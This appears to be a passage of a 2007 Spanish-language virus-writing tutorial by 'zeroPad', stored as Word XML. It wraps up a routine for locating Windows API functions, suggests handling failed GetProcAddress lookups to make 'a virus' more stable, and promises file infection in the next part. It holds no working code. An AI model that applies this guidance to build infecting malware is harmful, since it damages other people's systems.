        <w:t xml:space="preserve">[ebp + offset zFindFir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o siempre digo, estas no es la única forma de hacer esto, ni la mejor, lo que vale es la idea para que se entienda lo que se pretende, y después que cada uno cree sus propios códig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o idea para que investiguen les dejo dos instrucciones con las que se podría mejorar esta rutina: lodsd y movs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acá terminamos con la búsqueda de las API’s, se ha hecho largo pero es importante entender todo bien, y probar de cambiar el código, experimentar e ir viendo los resultados en Ollydbg, el cual será un gran aliado a la hora de realizar nuestro espéci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bo hacer una aclaración, si queremos darle una compatibilidad mayor a nuestro virus debemos tener en cuenta los nombres de las API’s, por ejemplo la API GetModuleHandleA la encontraremos con ese nombre a partir de Windows 95 en adelante, en Windows 3.1x la tendremos como GetModuleHandle solamente. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Incluso puede haber una variación si se trata de una versión Unicode, en cuyo caso la encontraríamos como GetModuleHandl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o también es importante por que en la rutina que vimos anteriormente dabamos por sentado de que encontrábamos todas las funciones buscadas, en ningún momento contemplamos la opción de que cuando llamamos a GetProcAddress no encontrara la API buscada (o sea que devuelva eax = 0), esto sería bueno también agregarlo en un virus si queremos darle mas estabilid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eno, ahora si, terminamos por ahora, en la próxima entrega ya comenzaremos a buscar archivos para infec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t>Nos vemos en la próxima. Salud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t>:: zeroPad ::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Julio de 2007</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_PictureBullets"/>
      <w:bookmarkStart w:id="5" w:name="_PictureBullets"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId10"/>
      <w:footerReference w:type="default" r:id="rId11"/>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zeroPad</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-07-31T17:34:00Z</dcterms:modified>
  <cp:revision>1982</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>